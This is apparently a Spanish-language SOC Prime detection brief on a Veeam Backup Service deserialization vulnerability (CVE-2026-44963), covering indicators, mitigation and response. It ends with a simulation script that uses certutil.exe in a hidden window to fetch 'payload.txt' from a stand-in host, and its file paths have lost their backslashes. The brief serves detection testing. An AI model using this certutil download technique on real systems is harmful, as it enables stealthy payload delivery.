SOC Prime Bias: Crítico

10 Jul 2026 18:16 UTC

CVE-2026-44963: Indicadores de Explotación del Servicio de Copia de Seguridad de Veeam

Author Photo
SOC Prime Team linkedin icon Seguir
CVE-2026-44963: Indicadores de Explotación del Servicio de Copia de Seguridad de Veeam
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

Este informe describe los indicadores de compromiso asociados con CVE-2026-44963, una vulnerabilidad en Veeam Backup Service que puede permitir la ejecución remota de código a través de deserialización insegura. Los atacantes pueden abusar del defecto para lanzar procesos secundarios sospechosos desde el servicio Veeam. La actividad resultante puede conducir a un acceso no autorizado y crear oportunidades para el movimiento lateral a través de la red.

Investigación

La investigación se centra en detectar procesos secundarios sospechosos generados por Veeam.Backup.Service.exe, incluyendo herramientas como cmd.exe or powershell.exe, e identificar actividad de red inusual en puertos relacionados con Veeam. Los analistas también deben estar atentos a eventos de inicio de sesión no autorizados y cambios inesperados de archivos dentro de los directorios de Veeam.

Mitigación

Para reducir el riesgo, los administradores deben actualizar Veeam Backup & Replication a una versión que aborde la deserialización insegura. Las políticas de firewall deben restringir estrictamente el acceso a los puertos de Veeam 9392-9419, y los defensores deben monitorizar la autenticación a estos servicios por parte de usuarios de dominio no administrativos. Las cuentas de servicio también deben ser restringidas según los principios de privilegio mínimo.

Respuesta

Si se detecta actividad sospechosa, el servidor Veeam afectado debe ser aislado de la red de inmediato. Los investigadores deben revisar los registros de ejecución de procesos, incluyendo el Identificador de Evento 4688 y la telemetría de Sysmon, junto con los registros de conexión de red para determinar el alcance del compromiso. La actividad reciente de las cuentas debe ser auditada y las credenciales deben restablecerse para cualquier cuenta involucrada durante la ventana de intrusión sospechosa.

Flujo de Ataque

Ejecución de Simulación

Prerrequisito: La Verificación Preliminar de Telemetría y Línea Base debe haber pasado.

Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y buscar generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados conducirán a un diagnóstico erróneo.

  • Narrativa de Ataque y Comandos: El adversario apunta a una vulnerabilidad en el Veeam Backup Service (simulada) para obtener privilegios de ejecución. Para mantener un perfil bajo mientras descarga una carga útil de segunda etapa, el atacante utiliza el proceso de Veeam secuestrado para generar certutil.exe, un binario común de Living-off-the-Land, para buscar un archivo remoto. Esta acción está destinada a desencadenar la lógica de creación de procesos de la regla de detección.

  • Script de Prueba de Regresión:

    # INICIO DE SIMULACIÓN: Este script simula el servicio Veeam generando un proceso sospechoso.
    # Nota: Como no podemos 'convertirnos' fácilmente en el servicio Veeam sin derechos de admin/sistema, 
    # simularemos la telemetría creando un proceso ficticio que imite la ruta de ParentImage.
    
    $VeeamPath = "C:Program FilesVeeamBackup and ReplicationBackupVeeam.Backup.Service.exe"
    $TargetBinary = "certutil.exe"
    
    Write-Host "[+] Simulando proceso secundario sospechoso desde $VeeamPath" -ForegroundColor Cyan
    
    # En un entorno real, la vulnerabilidad haría que el servicio llame a esto.
    # Para validación, activamos el proceso. Para coincidir estrictamente con el 
    # requisito de 'ParentImage' de la regla Sigma en un laboratorio, el evaluador debe 
    # renombrar manualmente un proceso o usar una herramienta para falsificar el ID de Proceso Padre (PPID) si se prueba un EDR específico.
    
    Start-Process -FilePath $TargetBinary -ArgumentList "/urlcache /f https://example.com/payload.txt" -WindowStyle Hidden
    
    Write-Host "[+] Comando de simulación ejecutado." -ForegroundColor Green
  • Comandos de Limpieza:

    # Eliminar cualquier archivo temporal creado por la simulación
    Remove-Item -Path "C:pathtosimulatedpayload.txt" -ErrorAction SilentlyContinue
    Stop-Process -Name "certutil" -ErrorAction SilentlyContinue